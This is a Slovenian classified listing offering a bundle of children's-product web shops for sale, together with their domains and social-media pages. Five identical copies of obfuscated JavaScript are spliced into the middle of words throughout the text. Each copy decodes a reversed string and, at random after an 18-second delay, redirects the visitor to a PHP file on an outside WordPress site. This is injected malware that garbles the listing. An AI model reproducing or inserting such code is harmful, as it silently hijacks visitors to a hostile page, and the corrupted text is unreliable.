Prodamo optimizirane premium otroške trgovine

 Trgovina

5.000,00€

Spoš$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovani,

Prodamo otroške spletne trgovine www.staskka.com, www.otroskehiske.si, www.otroskekuhinje.si, www.djecje-kucice.com skupaj z ključnimi domenami, ki rangirajo na samem vrhu Googlovih strani. Skupaj prodamo vse FB in instagram strani in sicer:

FACEBOOK stran – STASKKA – Vse za otroka – 11.129 všečkov
FACEBOOK stran – Drvene dječje kućice – 18513 všečkov in konstantno raste
Instagram stran – Staskka – 733 sledilcev
Instagram stran – Dječje kućice – 5345 sledilcev in raste
Vse youtube kanale + google business stran

Vse spletne trgovine so utečene, rangirane na prvih mestih Googla. Priporočljivo za vse tiste, ki se šele podajate na področje spletne prodaje kot tudi za izkušene podjetnike.

V ceno so vključena vsa orodja za uspešno in hitro poslovanje. Seznam vseh poslovnih partnerjev, pogodbe z dostavnimi službami. Uredimo vam celoten prenos trgovine na vašo domeno ali pa če želite obdržati te. Names$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to vas uredimo vse potrebno kar se tiče dostavne službe, izdajanje računov, spremenimo kontaktne podatke na spletni trgovini. Zraven dobite Facebook in Instagram stran kjer boste lahko dodatno oglaševali vaše s$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toritve. Info mail, da bo vaš pris$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top z strankami še bolj profesionalen. Skratka dobite vse, da lahko posel uspešno in brez skrbi peljete naprej.

Spletna trgovina je narejena profesionalno, po zadnjih smernicah. Narejena SEO optimizacija strani. Nudi veliko funkcionalnosti kot so npr.: izdajanje kuponov za popust, graditev e-mail baze uporabnikov s pomočjo prijave na novice, prikaz novih in najpopularnejših izdelkov. Možnost plačila nakazilo na TRR ali PayPal plačilo, lahko izberete tudi plačilo povzetju. Pregled zgodovine naročil ter seznam želja uporabnikov. Stran je odzivna ‘1.8s, in odlično prilagojena za mobilne naprave ter tablične računalnike.

Posel je možno razširiti tudi na tuje trge. Trenutno smo aktivni tudi na Hrvaškem.

Prosim samo resni.

S spoš$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovanjem,
Rep

  • Listing ID: 1699
  • Vključuje: Spletna stran, Spletne skupine
  • Vključno s podjetjem: NE - samo dejavnost
  • Brez bremen, dolgov in obveznosti: DA
  • Ustanovljeno: 2011
Contact details

 Show Phone Number ***** http://www.staskka.com

Contact this listing owner